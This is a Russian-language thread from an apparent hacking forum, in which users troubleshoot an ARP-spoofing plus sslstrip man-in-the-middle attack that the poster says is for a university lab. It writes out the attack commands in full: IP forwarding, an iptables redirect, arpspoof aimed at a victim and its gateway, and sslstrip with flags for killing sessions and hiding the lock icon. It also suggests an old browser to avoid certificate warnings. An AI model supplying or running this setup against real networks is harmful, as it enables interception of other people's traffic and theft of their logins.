Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Страница 1 из 2 12 ПоследняяПоследняя
Показано с 1 по 10 из 11
  1. #1
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    29
    Репутация
    22 + / -
    Script Kiddie

    Sslstrip + arpspoof, помогите решить проблему

    Всем привет, пытаюсь сделать подмену https на htpp(лаба в универе).
    Использую kali и windows 7.

    В терминале ввожу:

    Код:
    echo ‘1’ > /proc/sys/net/ipv4/ip_forward
     
    iptables -t nat -A PREROUTING -s 192.168.2.0/24 -p tcp -m multiport --dport 80,81,8000,8080 -j REDIRECT --to-port 8888
     
    arpspoof -i eth0 -t 192.168.19.160 -r 192.168.19.2
    На Windows 7 подмена шлюза происходит, все нормально.

    Затем в другом терминале ввожу:

    Код:
    sslstrip -l 8888 -w logger.log
    Затем на windows 7 захожу на mail.ru. И тут начинаются проблемы. Подмены https на http не происходит. В чем может быть проблема?

    [Только зарегистрированные могут видеть это. ]

  2. #2
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Эээ может в том что https идет по порту 443 а ты перегоняешь трафик с портов 80,81,8000,8080 ?
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  3. #3
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    29
    Репутация
    22 + / -
    Script Kiddie
    Не помогло.

    Пробовал так:
    iptables -t nat -A PREROUTING -p tcp -m multiport --dport 80,81,443,8000,8080 -j REDIRECT --to-port 8888
    sslstrip при этом пишет следующее:

    sslstrip 0.9 by Moxie Marlinspike running...
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
    ...
    Последний раз редактировалось 404notfound; 15.12.2014 в 23:06.

  4. #4
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Цитата Сообщение от 404notfound Посмотреть сообщение
    Не помогло.

    Пробовал так:
    iptables перзапустил после внесения изменений? (Хтя ты же выполняешь команду а не вносишь изменения в конфиг, не помню нужно ли его ребутать)
    Проверял вообще, что правило действует?
    Последний раз редактировалось Suicidemouse; 15.12.2014 в 23:03.
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  5. #5
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    29
    Репутация
    22 + / -
    Script Kiddie
    Как проверить не знаю, но после добавления порта 443 в правило iptables, сайты на винде открываться перестали.А как проверить можно, что переброс трафика происходит на порт 8888?

    Делал по статье: [Только зарегистрированные могут видеть это. ]

  6. #6
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Вон оно в чем дело то)
    sslstrip 0.9 by Moxie Marlinspike running...
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
    Короче тут все зависит от версии питона и sslstrip.
    sslstrip пользует python 2.6 как правило, sslstrip 0.9 работает на python 2.5 и выше (у тебя 2.7 можешь попробовать сделайт даунгрейд до 2.6)

    1)Измени скрипт sslstrip.py
    строку #!/usr/bin/env python
    на #!/usr/bin/python2.6
    2)попробуй запускать так sslstrip -p -l 8888 -w logger.log с или так python sslstrip.py -p -l 8888 -w logger.log
    3) Можешь попробовать переустановить sslstrip (и запускать с такими флагами sslstrip -p -k -f)
    где -p логируются только POST запросы
    -k убивает сессии
    -f зменяет иконку защищенного соединения (убирает замок)
    Последний раз редактировалось Suicidemouse; 15.12.2014 в 23:49.
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  7. #7
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Цитата Сообщение от 404notfound Посмотреть сообщение
    Как проверить не знаю, но после добавления порта 443 в правило iptables, сайты на винде открываться перестали.А как проверить можно, что переброс трафика происходит на порт 8888?

    Делал по статье: [Только зарегистрированные могут видеть это. ]
    Проверить можно wireshark'ом
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  8. #8
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Кстати да, догадываюсь почему у тебя страницы перестали открываться после того как ты добавил 443, sslstrip это по сути MiTM (тоесть человек по середине)
    Теперь логика
    если правило работает то трафик передается на 8888 - хавается стрипом который крашится... и дальше пакеты не идут)))
    не https станицы при этом должны норм открываться.
    «Вози кусты и героин, а то останешься рабом» © Буравчик

  9. #9
    Заблокирован по собственному желанию
    Аватар для DeNZeL

    Статус
    Offline
    Регистрация
    29.10.2014
    Сообщений
    455
    Репутация
    140 + / -
    Безопасность
    Я боюсь, что нынешние браузеры способны определить подмену сертификата....
    Уже писал в статье про dns_spoof что sslstrip не то что криво работает, а вообще не работает.
    Также читал на забугорном форуме, что можно сгенерировать свежий сертификат самому, но проблему с браузером это не решит...
    Не смотря на ошибки в терминале он логирует данные в свой log файл, так что на ошибки можно не обращать внимания.
    P.S: Пытался менять под версии python, редактировать исподники, результата ноль.

  10. #10
    Аватар для Suicidemouse

    Статус
    Offline
    Регистрация
    02.12.2013
    Сообщений
    351
    Репутация
    149 + / -
    Безопасность
    Ну для выполнения лабы можно и старый браузер поставить)
    «Вози кусты и героин, а то останешься рабом» © Буравчик

Страница 1 из 2 12 ПоследняяПоследняя

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.